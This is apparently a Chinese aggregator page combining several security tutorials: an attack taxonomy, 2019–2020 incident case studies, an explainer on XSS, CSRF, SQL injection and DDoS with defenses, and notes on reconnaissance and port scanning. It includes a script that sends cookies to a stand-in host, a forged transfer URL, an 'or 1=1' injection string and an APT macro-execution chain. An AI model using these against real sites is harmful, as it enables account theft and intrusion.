精华内容
下载资源
问答
  • 网络攻击概述

    千次阅读 2021-02-20 14:59:58
    (本文为笔者学习《网络攻防技术》所做总结,侵删) 网络安全威胁 重大网络安全威胁事件 网络安全威胁的成因

    (本文为笔者学习《网络攻防技术》所做总结,侵删)

    一、网络安全威胁

    网络安全威胁的内涵从广义上看是泛指所有对网络安全造成不良影响的事件,包括自然灾害、非恶意的人为损害以及网络攻击等;狭义上看是指各类网络攻击行为。

    (一)重大的网络安全威胁事件

    1. 凯文·米特尼克 20世纪80年代
      入侵多家公司内部网络,窃取大量信息资产和源代码,造成损失数百万美元(这个算是鼻祖之一吧,当年的数百万美元估计房子可以在北上广这样的城市买几十套)
    2. Morris蠕虫病毒 1988年
      当时莫里斯蠕虫病毒在网络上传播,感染了约6000台计算机,造成数千万美元的损失,随着互联网的发展和谐网络安全威胁事件造成的损失只会越来越大,从那个时候开始网络安全引起广泛关注
      说实话网络里现在还有好多蠕虫病毒的变种在继续潜伏,不过大多数杀毒软件都能直接识别
    3. web攻击出现 1998年
      以SQL注入为代表的web脚本攻击方式出现,迅速成为互联网安全的最大威胁之一
    4. 基于IRC的僵尸网络 1999年
      大量出现,为分布式拒绝服务攻击提供了前沿阵地
    5. 梅丽莎病毒 1999年
      是首个具有全球破坏力的病毒,破坏了世界上300多家公司的计算机系统,造成近4亿美元的损失
    6. 震网病毒 2010年
      针对伊朗核设施,是首个被公开披露的武器级网络攻击病毒
    7. “棱镜计划” 2013年
      由美国前中央情报局职员爱德华·斯诺登披露,棱镜监听项目,公开了大量针对实时通信和网络存储的监听窃密技术与计划
    8. 网络攻击工具集被盗取并被公开拍卖 2016年8月
      黑客组织“影子经纪人”陆续以多种形式在互联网公开拍卖据称来自美国国家安全局的网络攻击工具集,公开的部分资料显示这些工具集包含了大量针对路由设备、安全设备、WINDOWS操作系统等多个平台的0Day工具、攻击辅助工具和恶意代码
    9. 勒索病毒 2017年
      2017年5月,勒索病毒在全球范围内广泛传播,感染了150多个国家的近20万台计算机。勒索病毒借鉴的是工具集中“永恒之蓝”的漏洞利用工具《Start up》里面就讲到好几次这个病毒,男主贼强自己破解的,666

    (二)网络安全威胁的成因

    < 一 >技术因素

    1. 协议缺陷
      以TCP/IP协议簇为重点研究对象,主要安全缺陷有两方面:
      (1)缺乏有效的身份鉴别机制
      (2)缺乏有效的信息加密机制
    2. 软件漏洞
      比如冯氏结构的指数混存导致的缓冲区溢出问题;多线程对同一内存区域的访问限制问题导致机密信息泄露
    3. 策略弱点
      (1)安全策略设计时考虑不周,安全机制选择不适当;
      (2) 安全需求和应用需求相矛盾时,用户更愿意选择在安全策略方面做出妥协
    4. 硬件漏洞

    < 二 >人为因素

    1. 攻击方:黑客、敌对国家间谍组织、恐怖分子、商业间谍、犯罪分子等等
    2. 防守方:被动、人员缺口大

    二、网络攻击技术

    (一)网络攻击分类

    1. 按攻击的目的分:DOS拒绝服务攻击、获取系统权限攻击、获取敏感信息攻击
    2. 按攻击的机理分:缓冲区溢出攻击、SQL注入攻击
    3. 按攻击的实施过程:获取初级权限的攻击、提升最高权限的攻击、后门控制攻击等
    4. 按攻击的实施对象:对各种操作系统的攻击、对网络设备的攻击、对特定应用系统的攻击等
    5. 按攻击发生时攻击者与被攻击者的交互关系分:本地攻击、主动攻击、被动攻击、中间人攻击
      (1)本地攻击:攻击者通过实际接触被攻击的主机而实施的攻击
      特点:难以防御
      防御:主要依靠严格的安全管理制度
      (2)主动攻击:攻击者对被攻击主机所运行的web、FTP、Telnet等开放网络服务实施攻击
      防御:通过技术手段或安全策略加固系统开放的网络服务
      (3)被动攻击:攻击者对被攻击主机的客户程序实施攻击,包括钓鱼攻击、XSS攻击、网站挂马攻击等,通常从诱骗开始
      防御:①对系统及网络应用中的客户程序进行安全加固
      ②加强安全意识,辨别并应对网络攻击中的社会工程学手段
      (4)中间人攻击:攻击者处于被攻击主机的某个网络应用的中间人位置,实施数据窃听、破坏、篡改等攻击
      防御:为网络通信提供可靠的认证和加密机制,确保通信双方身份的合法性与通信内容的机密与完整性

    (二)网络攻击的步骤与方法

    一个完整的、有预谋的攻击可分为5个阶段:
    信息收集 >> 权限获取 >> 安装后门(长期控守) >> 扩大影响 >> 消除痕迹

    1. 信息收集(耗费时间最长):攻击者重点收集的内容有网络信息、系统信息、用户信息等
      (1)网络信息:域名、IP地址、网络拓扑
      (2)系统信息:OS版本、开放的各种网络服务版本
      (3)用户信息:用户标识、组标识、共享资源、邮件账号、及时通信软件账号
      攻击者收集的途径:通过技术手段直接对目标网络进行扫描探测、利用其他渠道了解攻击目标的类型和工作模式
      可能借助的方式有:互联网搜索、社会工程学、垃圾数据搜寻、域名管理/搜索服务
    2. 权限获取:获取目标系统的读、写、执行等权限,获得超级用户权限是攻击者在单个系统中的终极目标
      主要使用的技术:口令攻击、缓冲区溢出、web应用攻击等
    3. 安装后门(长期控守):在目标系统中安装后门或木马程序,从而以更加方便、更加隐蔽的方式对目标系统进行长期操控
      主要使用恶意代码相关技术:隐藏技术、通信机制、生存性技术等
    4. 扩大影响:以目标系统为跳板,对目标所属网络的其他主机进行攻击,最大程度地扩大有效攻击的效果
      主要使用的技术:嗅探、假消息攻击
    5. 清除痕迹:清除一切的攻击痕迹,以便尽可能长久地对目标进行控制,并防止被识别、追踪
      主要方法:针对目标所采取的安全措施清除各种日志及审计信息

    三、网络攻击发展趋势

    1. 攻击影响日益深远
    2. 攻击领域不断拓展
    3. 攻击技术愈加精细
    4. 供应链安全成为重要战场
    5. 数据泄露问题将导致更严重后果
    展开全文
  • 2019-2020年网络攻击事件 由于数据泄露、高危漏洞、网络攻击以及相关的网络犯罪呈现新的变化,个人安全意识缺乏、企业安全投入不足,也加重了网络安全事件所带来的损失和影响。 案例一:勒索病毒攻击部分政府部门和...

    2019-2020年网络攻击事件

    由于数据泄露、高危漏洞、网络攻击以及相关的网络犯罪呈现新的变化,个人安全意识缺乏、企业安全投入不足,也加重了网络安全事件所带来的损失和影响。

    案例一:勒索病毒攻击部分政府部门和医院:伪装成邮件对主机硬盘加密
    时间:2019年3月11日起。
    地点:中国部分政府部门和医院。
    攻击目的:对用户主机硬盘数据全盘加密,并要求缴纳赎金。
    攻击类型:本次攻击是版本号为GANDCRAB V5.2的勒索病毒。
    事件详情如下:据国家网络与信息安全信息通报中心监测发现,2019年3月11日起,境外某黑客组织对我国有关政府部门开展勒索病毒邮件攻击。邮件主题为“你必须在3月11日下午3点向警察局报到!”,发件人名为“Min,GapRyong”(有报告称还有其他假冒发件人约70余个),邮件附件名为“03-11-19.rar”。3月13日,据澎湃新闻记者了解,多个政府单位和企业收到了上述紧急通知,湖北省宜昌市夷陵区政府、中国烟草旗下福建武夷烟叶有限公司、中国科学院金属研究所等在其官网发布了上述消息。腾讯、360等互联网安全公司发布了预警信息。据360安全大脑的通报,目前已经收到多起国内用户感染GandCrab5.2版勒索病毒反馈。福建武夷烟叶有限公司的通知显示,目前,我国部分政府部门邮箱已遭到攻击。
    经分析研判,该勒索病毒版本号为GANDCRAB V5.2,是2019年2月最新升级的勒索病毒版本,运行后将对用户主机硬盘数据全盘加密,并让受害用户访问网址下载Tor浏览器,随后通过Tor浏览器登录攻击者的数字货币支付窗口,要求受害用户缴纳赎金。
    腾讯御见威胁情报中心安全专家告诉澎湃新闻记者,该病毒在国内擅长使用弱口令爆破、挂马、垃圾邮件传播,由于使用了RSA+Salsa20的加密方式,受害用户在无法拿到病毒作者手中私钥常规情况下,无法解密。据悉,GandCrab勒索病毒是国内目前最活跃的勒索病毒之一,在过去一年时间经过5次大版本更新,一直和安全厂商、执法部门斗智斗勇。
    对于GandCrab勒索病毒,安全专家建议,不要打开来历不明的邮件附件;及时安装主流杀毒软件,升级病毒库;在Windows中禁用U盘的自动运行功能及时升级操作系统安全补丁,升级Web、数据库等服务程序,防止病毒利用漏洞传播;对已感染主机或服务器采取断网措施,防止病毒扩散蔓延。

    案例二:丰田服务器遭黑客入侵,威胁310万用户信息
    时间:2019年4月1日
    地点:日本
    攻击目的:黑客入侵了其IT系统,并访问了几家销售子公司的数据。
    造成损失:约310万车主信息遭泄露
    攻击类型:黑客入侵了其IT系统。
    事件详情如下:2019年4月1日,丰田汽车公布了一起发生在日本主办事处的数据泄露事件。丰田汽车表示,黑客入侵了其IT系统,并访问了几家销售子公司的数据。这些子公司包括丰田东京销售控股公司、东京汽车、东京丰田、丰田东京卡罗拉、丰田东京销售网络、雷克萨斯Koishikawa Sales公司、Jamil Shoji(雷克萨斯Nerima)和丰田西东京卡罗拉。
    该公司表示,黑客访问的服务器存储了多达310万名客户的销售信息。丰田汽车称,目前正在调查此事,以确定黑客是否泄露了他们可以访问的任何数据。
    丰田汽车强调,客户的财务细节并未存储在被黑客攻击的服务器上。至于黑客可能访问了哪些类型的数据,丰田汽车并未披露。
    最后,丰田公司还对广大用户致歉:“我们向所有使用丰田和雷克萨斯汽车的客户表示歉意。我们认真对待这一问题,并将在经销商和整个丰田集团中彻底实施信息安全措施。

    案例三:美国银行第一资本遭黑客入侵,逾1亿用户信息泄露
    时间:入侵行动发生在2019年3月22日和23日
    地点:美国
    攻击目的:获取了逾1亿名顾客和潜在顾客的个人信息
    造成损失:在宣布这一消息后,第一资本股价在盘后交易中下跌1%。攻击类型:黑客入侵美国第一资本银行金融公司
    事件详情如下:北京时间7月30日,美国第一资本银行金融公司在周一披露,一名黑客获取了逾1亿名顾客和潜在顾客的个人信息,包括姓名、地址、电话号码和生日。
    美国第一资本称,公司在7月19日确认了这次黑客入侵事件,目前这名黑客已经被美国联邦调查局逮捕。在宣布这一消息后,第一资本股价在盘后交易中下跌1%。
    美国第一资本表示,大约有1亿美国用户和600万加拿大用户的个人信息受到了此次事件的影响,但是黑客没有获取任何信用卡账号,超过99%的社会安全号码没有泄露。
    “我们相信,这些信息不大可能被黑客用于欺诈或者四处传播。”美国第一资本在声明中称。
    根据美国第一资本披露的信息,包括2005年至2019年初信用卡申请者在内的基本个人信息被黑客访问,包括信用评分、支付历史以及部分交易数据。大约14万个美国顾客的社会安全号码以及8万个关联银行账号被获取。在加拿大,100万个社保账号被黑客访问。
    美国第一资本表示,将向受影响的个人通知这次入侵事件,并提供免费的信用监控和身份保护服务。

    案例四:湖北首例入侵物联网系统案告破 竞争对手破坏十万设备
    时间:3月21日至22日
    地点:中国湖北省
    攻击目的:为提高自己公司产品的市场占有率
    造成损失:共100余台设备被恶意升级无法使用、10万台设备离线,造成了重大经济损失。
    攻击类型:恶意攻击者从物联网卡入手,通过对通信协议的凭证伪造分别对web服务器和智能家居终端发起了黑客攻击,最终导致服务器拒绝服务,终端设备被强制下线,同时公司内部的智能家居终端设备也遭受一定程度上的宕机。
    事件详情如下:据警方介绍,3月21日至22日,位于光谷总部国际的“微锋”(化名)科技有限公司的多台物联网终端设备出现故障:自助洗衣机、自助充电桩、自助吹风机、按摩椅、摇摇车、抓娃娃机等均脱网无法正常运行。经统计,共100余台设备被恶意升级无法使用、10万台设备离线,造成了重大经济损失。
    接报案后,网警通过对故障设备的源代码进行解密,对公司服务器日志进行取证分析。原来从3月21日20时开始,公司服务器收到了大量的伪造离线报文,通过溯源分析,网警发现“微天地”科技公司谢某、王某有重大作案嫌疑。
    5月13日,民警在位于东湖新技术开发区精工科技园的“微天地”科技公司抓获谢某、王某。经审查核实,谢某系“微锋”公司前员工,2018年初离职时带走了该公司产品的设计源代码,后与王某共同成立了“微天地”科技公司,成为“微锋”公司的行业竞争对手。谢某、王某为提高自己公司产品的市场占有率,破解了“微锋”公司的物联网服务器,利用系统漏洞将终端设备恶意升级,导致100余台设备系统损坏,无法正常工作;同时模拟终端设备,以每秒3至4千条的速度给服务器发送伪造离线报文,导致10万台设备离线。

    案例五:日本Hoya公司遭受网络攻击,计算机被用于挖掘加密货币
    时间:2019年4月
    地点:日本
    攻击目的:黑客入侵了其IT系统,并访问了几家销售子公司的数据。
    造成损失:100多台电脑感染了病毒,导致Hoya公司的用户ID和密码被窃取;还在攻击期间试图挖掘加密货币,工厂生产线因此停止了三天。
    攻击类型:电脑感染病毒。
    事件详情如下:2019年4月,领先的光学产品制造商Hoya公司称,公司在2月底遭受了一次严重的网络攻击,100多台电脑感染了病毒,导致Hoya公司的用户ID和密码被窃取。还在攻击期间试图挖掘加密货币,工厂生产线因此停止了三天。
    Hoya公司是日本最大的公司之一,也是最大的光学产品生产商,它的年收入超过41亿美元。
    Hoya表示,网络攻击发生后,一台控制网络的计算机首先停机,工人们无法使用软件来订单和生产,因此工业产出比正常水平下降了大约40%。随后,病毒也开始在其他电脑上感染,但最终在开始加密货币挖掘操作之前被成功阻止。
    如今,嵌入网络系统和计算机以挖掘加密货币的病毒已成为网络黑客的常用工具。当访问某些不安全站点时,加密货币挖掘就会嵌入到浏览器中。

    案例六:印度APT黑客组织对我国的医疗机构发起了黑客攻击
    时间:2020年2月4日
    地点:中国
    攻击目的:在现在这种特殊的情况下他们这么做可能是为了获得我国的先进医疗技术;导致我国医疗机构瘫痪,对我国抗击疫情的行动产生重大影响。
    造成损失:所幸的是,在他们行动的时候,就被我国的网络安全公司抓个正着。对我国医疗机构发起黑客攻击的印度APT组织,并没有造成什么影响。
    攻击类型:采用鱼叉式钓鱼攻击方式,通过邮件进行投递。
    事件详情如下:在中国爆发重大疫情的时候,世界多国向我们伸出了援助之手,向我们捐赠了大量的医疗器械,帮助我们应对难关。然而,就在这个时候,我们的邻居印度,却趁机落井下石,对我们的医疗机构发起了黑客攻击,这种行为非常的恶劣,让人非常的气愤。要知道,一旦这次黑客攻击发生意外,导致我国医疗机构瘫痪,那么我国抗击疫情的行动都会受到重大影响。
    2 月 4 日,360 安全大脑捕获了一例利用新冠肺炎疫情相关题材投递的攻击案例,攻击者利用肺炎疫情相关题材作为诱饵文档,对抗击疫情的医疗工作领域发动 APT 攻击。
    该攻击组织采用鱼叉式钓鱼攻击方式,通过邮件进行投递,利用当前肺炎疫情等相关题材作为诱饵文档,部分相关诱饵文档如:武汉旅行信息收集申请表.xlsm,进而通过相关提示诱导受害者执行宏命令。
    攻击者将关键数据存在 worksheet 里,worksheet 被加密,宏代码里面使用 key 去解密然后取数据。然而,其用于解密数据的 Key 为:nhc_gover,而 nhc 正是国家卫生健康委员会的英文缩写。一旦宏命令被执行,攻击者就能访问hxxp://45.xxx.xxx.xx/window.sct,并使用 scrobj.dll 远程执行 Sct 文件。
    攻击者利用新冠肺炎疫情相关题材作为诱饵文档,进行鱼叉式攻击时,医疗机构、医疗工作领域成为此次攻击的最大受害者。一旦其“攻击阴谋”得逞,轻则丢失数据、引发计算机故障,重则影响各地疫情防控工作的有序推进,危及个人乃至企业政府等各机构的网路安全。尤其面对这等有着国家级背景的 APT 组织的攻击,后果简直不堪设想。
    在现在这种特殊的时期,为防止黑客以疫情有关词汇或信息为诱饵,通过社交网络、钓鱼邮件等渠道传播计算机病毒,进行网络攻击,可能造成操作系统核心文件、注册表被删除,主机被远程控制,信息被窃取等危害,我们一定要提高警惕、加强防范。
    防范网络攻击小技巧:
    1.安装必要的杀毒软件,及时更新杀毒软件程序并保证随时开启;
    2.不要打开来历不明的电子邮件或下载不明来源的文件;
    3.切勿轻易下载或点击对于含有“冠状病毒”、“疫情”、“武汉”等热点词汇的可执行文件、不明来源的疫情有关文档、邮件、压缩包等;
    4.不要启用Office宏,除非文档来自可信来源;
    5.对于公用的系统,做好权限、密码管理和保护。
    最后,对于网络攻击北京网络与信息安全信息通报中心建议,及时开展自查验证;所有服务器、终端应强行实施复杂密码策略,杜绝弱口令;安装杀毒软件、终端安全管理软件并及时更新病毒库;及时安装漏洞补丁;服务器开启关键日志收集功能,为安全事件的追溯提供基础;尽量关闭不必要的文件共享权限以及关闭不必要的端口;建议关闭远程桌面协议;合理划分内网安全域;强化业务数据备份;加强应急处置,加强监测。

    展开全文
  • 几种常见的网络攻击

    千次阅读 2020-05-02 23:44:46
    网络攻击XSSCSRFSQL注入DDOS XSS XSS,跨站请求伪造(cross site scripting,百科上说它和那个样式的CSS引起歧义,所以叫XSS?)。将一段Html和JavaScript代码注入到用户浏览的网页上。如何注入?譬如在某个...

    网络攻击


    XSS

    XSS,跨站脚本攻击(cross site scripting,百科上说它和那个样式的CSS引起歧义,所以叫XSS?)。将一段Html和JavaScript代码注入到用户浏览的网页上。

    如何注入?譬如在某个评论里,发表一段如下代码:(可以尝试在csdn上试试),如果该网站通过cookie管理用户名密码,那访问含有该脚本的链接后,会携带cookie到abc.com中,攻击者即可获得cookie数据。

     <script>
       	location.href="//abc.com/?c="+document.cookie</script>
     </script>
    

    窃取cookie只是危害之一,攻击者也可伪造表单骗取用户填写比较隐私的信息从而达到窃取的目的。第三种,也是比较常见的,一般表现为刷广告,即在某个网站嵌入一段可以显示脚本或者文章的脚本代码。

    防范的策略之一,利用浏览器的同源策略。不过浏览器这种东西本身就不是绝对可靠,且同源策略也不是没法破解。第二种策略则是设置cookie为HttpOnly,即防止恶意脚本获取cookie。第三种策略则是过滤特殊字符,这也是很多可以评论的网站常见的手段之一。

    CSRF

    跨站请求伪造(cross site request forgery),攻击者通过骗取用户访问一个曾经认证过的网站,然后执行一些非法操作,如转钱。譬如某个支付机构设计的一个低能的转账请求如下:

    http;//abc.com?account=A&money=100
    

    并且,用户曾对abc.com认证过,譬如记住账号密码,此时攻击者可以在它的网站伪造个链接或者放一张图片,其链接如下,由于攻击者曾认证过,该操作被视为合法,攻击者获得10元。

    http;//abc.com?account=攻击者&money=100
    

    咋一看CSRF和XSS很像,其实确实有点像,不过XSS利用的是用户对网站的信任,而CSRF利用的是服务对用户浏览器的信任。

    CSRF的防范策略有三,一种是利用HTTP报文中的Referer字段,用于标识请求的来源地址,通过检查Referer字段,让只有合法的请求来源才能有执行的权限。第二种则是token,最简单的方式服务端随机出随机数,并要求每个请求都带上。第三种则是输入验证码,这种手段也比较常见了。

    SQL注入

    SQL注入也是比较烂大街的攻击手段了,利用的是SQL语句的执行漏洞。如下,当我account填入A or 1=1,pwd填入c or 1 =1,则变成条件永远成立了,从而可以执行某个用户的操作。

    select * from user where account=A and pwd = B
    select * from user where (account=A or 1 =1) and (pwd = B or 1 =1)
    

    这种攻击也比较好处理,SQL语句预编译,正则过滤请求中的特殊字符,或者对一些特殊符号预先转换。

    DDOS

    分布式拒绝服务攻击(Distributed Denial of Service),能做这种攻击且成功的,一般攻击者花费的成本也会不少。它利用多台服务器在某个瞬间内发送大量请求至某个目标服务器中,从而耗费你的服务器资源,让你的服务瘫痪。

    这种一般比较很难解决,如果是针对ip进访问限制,有时会误伤友军。最常见的攻击形式有如下几种。 SYN/ACK Flood 最经典最有效的利用 TCP 协议的 DDos 攻击手段,可通杀各种系统的网络服务:

    1. SYN Flood(半连接攻击):我们的TCP连接虽然可靠,但也有不可靠之处。TCP请求中,我们发送syn帧之后,服务端发送ack+syn应答。如果客户端端方syn就立即掉线,服务端还是会傻傻的的等待一段时间即SYN TIMEOUT。SYN Flood说的就是攻击者利用上述的漏洞,用大量主机模拟这种情况,从而让目标服务器不能正常工作。

    可以通过缩短 SYN Timeout 时间,降低服务器负荷;设置 SYN Cookie,记录请求连接的 IP地址,丢弃来自某个/些 IP 的重复 SYN 报文;

    2. ACK Flood:ACK Flood说的就是TCP正常连接后,由于大量主机发送请求,服务端忙于接受报文,判断请求状态,向应从请求(发送rst应答或者ack应答),从而无法正常执行其他请求,最终让其他服务瘫痪。

    没有针对性的防御方案,可以通过分析请求的报文,设定专门的应答策略。

    3. TCP 全连接攻击,这种攻击方式也是成本也是比较高的,首先你的浏览器一般默认的TCP链接最大为8,再者你的服务器TCP连接数也会有一个限制,这意味你需要很多主机来模拟这种请求。对于攻击目标而言,目标服务器的 TCP 连接数也是有限的,一旦你的服务压不过攻击者,那你的网站则会非常缓慢甚至无法访问。

    根据实际情况设置TCP 新建连接速率、异常报文数阈值,超过该阈值启动防御;针对源进行统计,如果某个源 IP 在指定的时间间隔内发起的 TCP 新建连接数超过了阈值,则将该源 IP 加入黑名单; 针对报文数进行检查,如果特定时间内通过的报文数小于阈值则判定为异常会话,如果指定时间内某个源 IP 异常会话超过了阈值,则该源 IP 加入黑名单。

    4. CC(Challenge Collapsar)攻击又称HTTP Flood,这种请求也不是很好处理,应为它就像量比较大的正常请求,不过有迹可循的是,在某个时间段内,它集中于攻击网站里头需要较长计算时间的请求,使你的服务达到瓶颈。

    网站页面静态化,针对开销较大的资源,针对某个ip限制访问问频率、避免数据库慢查询、选择适合的缓存、消息队列等。

    5. ICMP(Internet Control Message Protocol),即 Internet 控制报文协议,在短时间内,攻击者向目的主机发送大量 Ping 包,消耗主机资源,主机资源耗尽后就会瘫痪或者无法提供其他服务。

    通过禁用ICMP解决,有些网站你会发现虽然ping不通,但它正常服务是没有问题的

    6. UDP Flood,UDP 是无连接状态的协议,攻击者发送大量伪造源IP地址的小 UDP 包,冲击 DNS 服务器(即 UDP DNS Query Flood)或 Radius 认证服务器、流媒体视频服务器等,将线路上的骨干设备例如防火墙打瘫,造成整个网段的瘫痪,是一个消耗双方资源的攻击。

    判断包大小,如果是大包攻击,则使用防止 UDP 碎片方法:根据攻击包大小设定包碎片重组大小,通常不小于1500;在极端情况下,可以考虑丢弃所有 UDP 碎片。攻击端口为业务端口:根据该业务 UDP 最大包长设置 UDP 最大包大小以过滤异常流量;攻击端口为非业务端口则丢弃所有 UDP 包,可能会误伤正常业务;建立 UDP 连接规则,要求所有去往该端口的 UDP 包,必须首先与 TCP 端口建立 TCP 连接。

    展开全文
  • 网络安全第五讲 网络攻击技术分析

    万次阅读 多人点赞 2020-10-24 17:06:30
    网络信息安全第五讲 网络攻击技术分析 按照攻击目的,可将攻击分为破坏型和入侵型两种类型。 破坏型攻击以破坏目标为目的,但攻击者不能随意控制目标的系统资源。 入侵型攻击以控制目标为目的,比破坏型攻击威胁更...

    网络信息安全第五讲 网络攻击技术分析

    • 按照攻击目的,可将攻击分为破坏型入侵型两种类型。
    • 破坏型攻击以破坏目标为目的,但攻击者不能随意控制目标的系统资源。
    • 入侵型攻击以控制目标为目的,比破坏型攻击威胁更大,常见的攻击类型多为入侵型攻击。
    • 攻击主要内容

    在这里插入图片描述

    一 网络信息采集

    • 入侵者一般首先通过网络扫描技术进行网络信息采集,获取网络拓扑结构、发现网络漏洞、探查主机基本情况端口开放程度,为实施攻击提供必要的信息。
    • 网络信息采集有多种途径,既可以使用诸如ping、whois等网络测试命令实现,也可以通过漏洞扫描、端口扫描网络窃听工具实现。

    1.常用信息采集命令

    • Ping命令:用于确定本地主机是否能与远程主机交换数据包,通过向目标主机发送ICMP(internet control message protocol,Internet控制报文协议)回应请求来测试目标的可达性。使用ping命令能够察看网络中有哪些主机接入Internet;测试目标主机的计算机名和IP地址;计算到达目标网络所经过的路由数;获得该网段的网络拓扑信息。
    • 推算数据包通过的路由器数:例如,返回TTL值为119,可以推算出TTL初值为128,源地址到目标地址要通过128-119=9个路由器。
    • host命令:host命令是Linux、Unix系统提供的有关Internet域名查询的命令。可以从域中的DNS(domain name server,域名服务器)服务器获得所在域内主机的相关资料,实现主机名到IP地址的映射,得知域中邮件服务器的信息。
    • Traceroute命令:Traceroute命令用于路由跟踪,判断从本地主机到目标主机经过哪些路由器、跳计数、响应时间等。Traceroute程序跟踪的路径是源主机到目的主机的一条路径,但是,不能保证或认为数据包总是遵循这个路径。
    • Nbtstat命令:nbtstat(NBT statistics,NBT统计信息,其中NBT为NetBIOS over TCP/IP)命令是Windows命令,用于查看当前基于网络基本输入输出系统NetBIOS(network basic input output system)的TCP/IP连接状态。通过该工具可以获得远程或本地机器的组名和机器名
    • Net命令:用于检验和核查计算机之间NetBIOS连接的net viewnet use两个命令可能被攻击者利用,来查看局域网内部情况和局域网内部的漏洞。
    • Finger命令:用来查询用户的信息,通常会显示系统中某个用户的用户名、主目录、闲滞时间、登录时间、登录shell等信息。
    • Whois命令:Whois命令是一种Internet的目录服务命令,它提供了在Internet上的一台主机或某个域所有者的信息,包括:管理员姓名、通信地址、电话号码、Email信息、Primary和Secondary域名服务器信息等。
    • Nslookup命令:在Internet中存在许多免费的nslookup服务器,它们提供域名到IP地址的映射服务和IP地址到域名的映射等有关网络信息的服务。通过nslookup攻击者可以在whois命令的基础上获得更多目标网络信息。

    2.漏洞扫描

    • 漏洞是指系统硬件操作系统软件网络协议数据库等在设计上和实现上出现的可以被攻击者利用的错误、缺陷和疏漏。
    • 漏洞扫描程序是用来检测远程或本地主机安全漏洞的工具。
    • 针对扫描对象的不同,漏洞扫描又可分为网络扫描、操作系统扫描、WWW服务扫描、数据库扫描以及无线网络扫描等。
    • 计算机系统漏洞:Windows NT IIS 4.0的ISAPI DLL对输入的URL未做适当的边界检查,如果构造一个超长的URL,可以溢出IIS (inetinfo.exe)的缓冲区,执行我们指定的代码。由于inetinfo.exe是以local system身份启动,溢出后可以直接得到管理员权限。
    • 堆栈指纹扫描:不同操作系统在网络协议上存在差异,可以通过总结操作系统之间的这种差异,编写测试脚本,向目标系统的端口发送各种特殊的数据包,并根据系统对数据包回应的差别来判定目标系统及相关服务。这种利用TCP/IP协议识别不同操作系统和服务种类的技术称为堆栈指纹扫描技术。
    • 常用堆栈指纹扫描技术
      在这里插入图片描述
    1. ICMP错误消息抑制机制:在RFC1812关于IPv4路由的规定中,对ICMP的错误类型信息的发送频率作了限制,不同操作系统对这种限制的策略不同。攻击者可以向某个随机的高端UDP端口发送成批的数据包,并计算接收到的目标不可达数据包的数量,来判断操作系统类别。这种探测操作系统的方法需要的时间较长,并且对网络性能会造成一定的影响。
    2. ICMP错误消息引用机制:对于端口不可达信息,几乎所有操作系统都使用了规范的ICMP错误信息格式,即回送一个IP请求头加8字节长度的包,Solaris和Linux返回的数据包大于这个长度。据此可猜测目标主机是否使用Linux或Solaris操作系统。
    3. ICMP错误消息回文完整性:当返回端口不可达数据包时,某些操作系统在初始化处理过程中会弄乱返回数据包的包头,这样接收到的数据包中会出现不正常的数据。由于TTL值的改变导致校验和需要修改时,AIX、FreeBSD等操作系统将返回不正确的校验和或设置校验和为0。
    4. FIN探查:FIN探查不遵循完整的三次握手连接,而是直接向目标端口发送一个带有FIN标记的TCP数据包。根据RFC793中的TCP连接状态图(事件处理) :当处于关闭、监听、请求同步状态时,如果接收到FIN数据包,则丢弃该包并返回原状态。但MS Windows、BSDi、HP-UX、MVS、IRIX等操作系统并不遵守这个规定,而会使用RESET响应这个FIN数据包。据此,可粗略推断目标主机使用的操作系统类别。
    5. TCP ISN采样:TCP初始序列号ISN(initial sequence numbe)采样是利用TCP协议中初始序列号长度与特定的操作系统相匹配的方法。较早的Unix版本在处理TCP协议时,初始序列号长度为64K;Solaris、IRIX、FreeBSD、DigitalUnix、Cray等操作系统,则使用随机增长的长度;Windows操作系统的序列号长度使用依赖时间的模型,使ISN在每个时间周期递增一个小的固定数值;有一些设备则使用固定的常数,如3Com的集线器使用常数0x803H,Apple LaserWriter打印机使用常数0xc7001。有经验的攻击者甚至可以通过计算有关序列号的函数,来进一步识别操作系统类别。
    6. TCP初始窗口:TCP使用滑动窗口为两台主机间传送缓冲数据。每台主机支持两个滑动窗口,一个接收数据,另一个发送数据。窗口尺寸表示计算机可以缓冲的数据量大小。通过在初始化三次握手后检查返回的TCP包窗口大小和改变大小的规律,可识别某些操作系统的类型。
    7. TCP选项: 并不是所有的操作系统都支持TCP包中的所有选项,可以设计TCP包内容和类型,探测目标操作系统类别。可以向目标主机发送带有可选项标记的数据包,如果操作系统支持这些选项,会在返回包中也设置这些标记。使用TCP选项方法,可以一次在数据包中设置多个可选项,增加探测的准确度,节约探测时间。
    8. MSS选项:根据RFC793有关TCP头格式的资料,MSS(maximum segment size最大数据段大小)规定了发送方可以接收的最大的TCP分片。但不同的操作系统的MSS值略有不同,绝大多数系统使用1460大小的MSS,NOVELL使用的是1368,而部分FreeBSD的版本使用512大小的MSS。
    9. IP协议包头不可分片位:IP协议包头内有一段3位的标志位,其中第一个控制位指定数据包是否被分片。根据RFC1191,当使用路径MTU(maximum transmission unit,最大传输单元)发现技术查询PMTU(path MTU),以确定传输路径上的最小MTU时,所有TCP数据包必须设置DF位(don’t fragment不可分片),但FreeBSD 5.0-CURRENT版本存在缺陷,在SYN-ACK包中没有设置DF位,攻击者可以通过连接服务器并截获网络通信数据判别是否是FreeBSD 5.0-CURRENT系统。
    10. 服务类型TOS:IP包头有8位服务类型字段,用来规定数据包的处理方式,其中包括3位的优先域(precedence field),用来指定IP数据包的8个优先级别;4位的服务类型域(type of service),用来描述网络在路由IP数据包时如何平衡吞吐率、延时、可靠性和代价;和MBZ(must be zero)域。当一个MBZ为1的ICMP请求数据包到达目标主机时,FreeBSD 4.1.1送回的应答数据包中MBZ为1,而Windows 2000 Pro送回的应答数据包中MBZ为0。

    3.端口扫描

    • 计算机的端口是输入/输出设备和CPU之间进行数据传输的通道。
    • 通过端口扫描,可以发现打开或正在监听的端口,一个打开的端口就是一个潜在的入侵通道。
    • 每一台计算机都有65536个端口可供使用。
    • 前1024个端口被作为系统处理的端口而保留 ,并向外界的请求提供众所周知的服务,所以这些端口被攻击者视为重点检查对象,以减少扫描范围,缩短扫描时间。
    1. TCP端口扫描:向目标主机的指定端口建立一个TCP全连接过程,即完成三次握手过程,从而确定目标端口是否已激活或正在监听。这是一种最基本的,也是最简单的扫描方式。但通常也会留下日志,易被发现
    2. TCP SYN扫描:向目标端口发送一个SYN数据包,如果应答是RST,说明端口是关闭的;如果应答中包含SYN和ACK,说明目标端口处于监听状态。使用SYN扫描并不完成三次握手过程,所以这种技术通常被称为半连接扫描。由于很少有站点会记录这种连接,所以SYN扫描也被称为半公开或秘密扫描
